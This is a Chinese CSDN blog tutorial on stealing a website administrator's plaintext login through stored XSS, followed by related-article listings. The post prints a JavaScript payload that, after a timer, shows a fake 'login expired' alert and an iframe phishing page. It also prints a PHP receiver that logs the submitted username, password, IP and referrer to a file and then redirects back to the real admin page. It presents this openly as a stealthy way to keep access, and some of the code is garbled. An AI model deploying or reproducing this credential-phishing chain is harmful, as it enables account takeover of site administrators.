html输入账号密码后跳转_【超详细入门教程】通过xss获取管理员明文账号密码...

最新推荐文章于 2024-08-13 23:36:16 发布
最新推荐文章于 2024-08-13 23:36:16 发布
阅读量2.6k 收藏
点赞数
文章标签: html输入账号密码后跳转
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39574720/article/details/113078062
版权
本文介绍了如何在管理员登录后台时,利用xss漏洞获取其账号密码,从而实现权限维持。通过创建钓鱼页面和数据接收文件,当管理员在钓鱼页面输入信息后,数据被发送到攻击者的服务器,达到隐蔽持久的效果。
摘要由CSDN通过智能技术生成

0x00  前言

本文所讲的知识点很早就有,只是因为最近小伙伴讨论的比较多,而且很多小伙伴不太明确流程,故有了此文,大佬请忽略

xss大家都不陌生,最常用的就是打管理员的cookie然后拿到后台权限。

但是在实战过程中会碰到很多因素导致无法获得权限或者权限维持困难,下面列举了三点。

随着开发者安全意识的提高,现在基本上都是开了httponly了,也就是说xss无法读取到cookie了(除了包含登录信息外的cookie一般还是可以获取的),这是其一。

cookie具有时效性,比如说获取到的cookie过期了,而管理员又没有进行第二次登录并触发的情况下,你的权限就掉了,这是其二。

xss漏洞已修复,并且之前的代码已被删除或者无法触发(比如说xss在一个留言处,当后面有很多留言时,你的代码可能就到下一页去了,管理员也一般不会去翻,也就不会触发),这是其三

所以本篇文章就来介绍通过xss来获取管理员的账号密码,实现权限的维持,而且获取了账号密码,用途还有很多,比如说社工。

0x01 流程

d92179cbce4b496b231e2471c6506deb.png

打字描述不太直观,直接上一个流程图

0x02 准备工作

根据流程图中所展示,我们需要一个钓鱼页面(高仿原登录页面)和一个数据接收文件。为了简单明了的演示,这里准备了以下文件:

admin_login.html  //原管理登录页面admin_index.html  //原管理后台页面fish.html         //我们高仿的登录页面,也就是钓鱼页get.php           //数据接收文件xss.js            //xss的payload

代码量很小,我在这里直接贴出来

//admin_login.html  原管理登录页面管理员登录用户名:密码: 
//admin_index.html  原管理后台页面<body><head><title>管理员后台title>head><h1>这里是管理员后台,你已成功登录h1><button type="button">一键日卫星button><hr><b>最新留言b><ul><li>说书人长得好帅li><li>楼上说得对<script src= "http://127.0.0.1/xss.js">script>li>ul>body>html>
//fish.html  我们仿的登录页面,也就是钓鱼页<head><title>管理员登录title>head>"post" action=用户名:密码: 
//get.php  数据接收文件<?php $line = '----------------------------------'."\r\n";$user = '账号:'.$_POST['username']."\r\n";$pwd = '密码:'.$_POST['password']."\r\n";$ip = 'IP:'.getenv('REMOTE_ADDR')."\r\n";$url = '钓鱼模板:'.getenv('HTTP_REFERER')."\r\n";$date ='日期:'. date("Y-m-d")."\r\n";$result = $line.$url.$user.$pwd.$ip.$date;file_put_contents('good.txt',$result, FILE_APPEND);header("Location: http://127.0.0.1/admin_index.html");?>
//xss.js  xss的payloadsetTimeout(function() {    alert("登陆过期,请重新登陆!");    parent.document.writeln(");    setTimeout(function() {        document.getElementsByTagName("body")[0].setAttribute("style", "margin: 2px;");    },    100);    setTimeout(function() {        parent.document.getElementsByTagName("body")[0].setAttribute("style", "margin: 0px;");    },    100);},600000);

0x03 本地演示

首先管理员登录后台后,xss触发了,弹窗提示登录过期,需要重新登录

b2d6991ec207efbe0a7a617b082f70c0.png

然后出来的是iframe的钓鱼页面,注意地址没有跳转到我们的钓鱼页面url

a0a9a768b0fd4035b51894d2a1af6f8b.png

管理员输入完账号密码后,又跳转回真实的后台页面,由于登录信息并没有失效,所以刚刚的登录仿真度极高。于此同时,我们的接收程序已经将管理员账号密码保存到了我们的钓鱼服务器上

d5bcfcddb4289500bfb283a4ce430adb.png

0x04  结尾

xss.js的第14行的600000指的是每10分钟执行一次,符合一般的过期规则,大家也可以自行修改。由于仿真度极高,不易察觉,所以权限维持率高。

----------

扫一扫关注我们

dfff86d5351d0989bf9e8555d931bb32.png实验室也即将正式启动,欢迎各位有能力的大师傅、和正在努力向上的兄弟前来入驻,联系下方小Tone

c7f72c6e60d4e57dcb8043becab92ecd.png

weixin_39574720
关注
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
热门推荐
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
html输入账号密码跳转_浅析渗透实战中url跳转漏洞
weixin_33291014的博客
01-20 2444
前言最近在一些厂商项目中开始接触到一些url任意重定向,虽然是低危,奖金较低,(虽然国外已经是几百$)但是一旦找到突破点,几乎整个站的url跳转都可以bypass,一个厂商所有点的url跳转加起来奖金也比较可观,所以将自己挖掘过程中一点点心得分享一下。简介先走个流程说些废话,url重定向漏洞也称url任意跳转漏洞,网站信任了用户的输入导致恶意攻击,url重定向主要用来钓鱼,比如url跳转...
js获取header_【详细入门教程】通过xss获取管理员明文账号密码
weixin_39662611的博客
12-01 704
0x00前言本文所讲的知识点很早就有,只是因为最近小伙伴讨论的比较多,而且很多小伙伴不太明确流程,故有了此文,大佬请忽略xss大家都不陌生,最常用的就是打管理员的cookie然后拿到后台权限。但是在实战过程中会碰到很多因素导致无法获得权限或者权限维持困难,下面列举了三点。随着开发者安全意识的提高,现在基本上都是开了httponly了,也就是说xss无法读取到cookie了(除了包含登...
使用HTML和cgi实现网页登录功能
最新发布
kaneki_lh的博客
08-13 281
登陆成功则会跳转到此页面。
html输入账号密码才能跳转,HTML输入字段跳转
weixin_42316319的博客
06-04 1065
我有2个文本字段,用户名和密码。当我输入密码时,它跳到第一个。我不知道为什么会这样。我无法找到它为什么跳。如何更改密码表单不跳转?这里是代码:HTML输入字段跳转session_start();require_once 'database.php';if (isset($_SESSION['user'])){echo "Welcome ".$_SESSION['user'];?>}elsei...
行内元素去掉外边距
Bitter的博客
08-10 329
<!DOCTYPE html> <html lang="zh-CN"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document
html输入密码跳转页面_[优化]注册、登录、修改密码
weixin_39814088的博客
11-28 3565
解决“注册、登录、修改密码”里面一些共通的问题:加入反馈信息,操作失败或者成功都会产生提示。解决成功登录以后的重定向问题,会跳转到之前的页面而不是永远跳转首页。1、注册成功以后……提示成功并跳转以前是直接跳转登录页,没有明显的提示。(一个简单的js计时器)2、注册失败以后……提示原因原来现在3、login失败并弹出提示,直接刷新了页面,有误导……由于这个视图使用的是内置auth app现成的东西:...
14. Spring Boot 2.x 最佳实践之 Spring Security 集成
极客星云-CSDN博客
11-30 1422
Spring Boot 2.x 最佳实践之 Spring Security 集成
【干货】XSS知识总结
hackzkaq的博客
10-27 6702
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
网络渗透.
L3546419161的博客
03-25 3648
PowerSploit是一款基于PowerShell的后渗透框架软件,包含了很多PowerShell的攻击脚本,它们主要用于渗透中的信息侦测,权限提升、权限维持等。PowerSploit项目地址:https://github.com/PowerShellMafia/PowerSploit 下载PowerSploit脚本到服务器,搭建一个简易的WEB服务器。将PowerSploit目录放到WEB目录,使其可以通过HTTP访问到。 这里以kali服务器为例,介绍两种方式 第一种方式: 开启apache服务:s
js 特效 html 特效 输入密码后才能进入页面
08-25
js 特效 html 特效 输入密码后才能进入页面 js 特效 html 特效 输入密码后才能进入页面
实现了基础的登录页面,支持记住密码,登录成功后跳转到欢迎页面
08-01
使用简洁的代码实现了登录页面,并支持记住密码,再登录成功后可以成功跳转到欢迎页面。
进网页需要输用户名和密码
01-20
同上,如何去掉跳出的对话框
html+js实现输入用户名和密码点击登录跳转页面
m0_54256047的博客
12-28 1万+
html+js实现输入用户名和密码点击登录跳转页面
HTML设置密码输入密码正确跳转到另一页面。html中inpute标签透明设置。鼠标放上去放大impute标签。
qq_46444918的博客
10-17 5829
填写要打开网页的地址,正确跳转,不对就循环。if((e||event).keyCode==13 13是回车键对应的数字,“如果按下回车”document.getElementById("password").value获得输入的值。onclick="huiche()"点击后调用huiche()函数。=="zjrzdgdfFGZHDS"判断是否等于设置的密码。id="password"用于记录输入的内容。
html输入密码跳转文本,js获取inpu焦点,输入完1位数字后自动跳到第二个input,类似支付宝密码输入完自动跳转...
weixin_42131443的博客
06-04 278
类似于这样的以下直接贴代码蒙版遮罩1.文字描述12.文字描述2onload = function(){var txts = wrap.getElementsByTagName("input");for(var i = 0; ivar t = txts[i];t.index = i;t.setAttribute("readonly", true);t.onkeyup=function(){this....
最新登陆页面基于html、css,含密码判断跳转页面
2201_75903640的博客
08-25 240
解决了页面放缩问题以及密码错误跳转到原来页面。
html输入密码跳转页面_【小乔锦囊】角色/仓库密码无法清除,怎么办?
weixin_39647787的博客
11-16 229
— ◆ 小 乔 锦 囊 ◆—近期,小乔收到玩家宝宝们的提问:在客服专区中进行角色或仓库密码的清除时,会收到登录验证失败的提示,应该怎么办?辛苦玩家宝宝们的热心反馈!该问题目前已在紧急修复中。同时,小乔也带来了一枚献计锦囊,里面包含处理该问题的两种办法,遇到该情况的玩家宝宝快来试试吧~方案一 手机QQ清除法1使用手机QQ登录游戏QQ。根据自己的清除需求,复制下方链接至手机QQ(可发送...
Android WebView获取用户输入账号密码的实现
"这篇文章主要讲解了如何在Android应用中使用WebView控件捕获用户输入的信息,特别是当用户在内嵌的WebView中填写账号和密码时,如何获取这些数据。" 在Android开发中,WebView是一个非常重要的组件,它可以加载...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值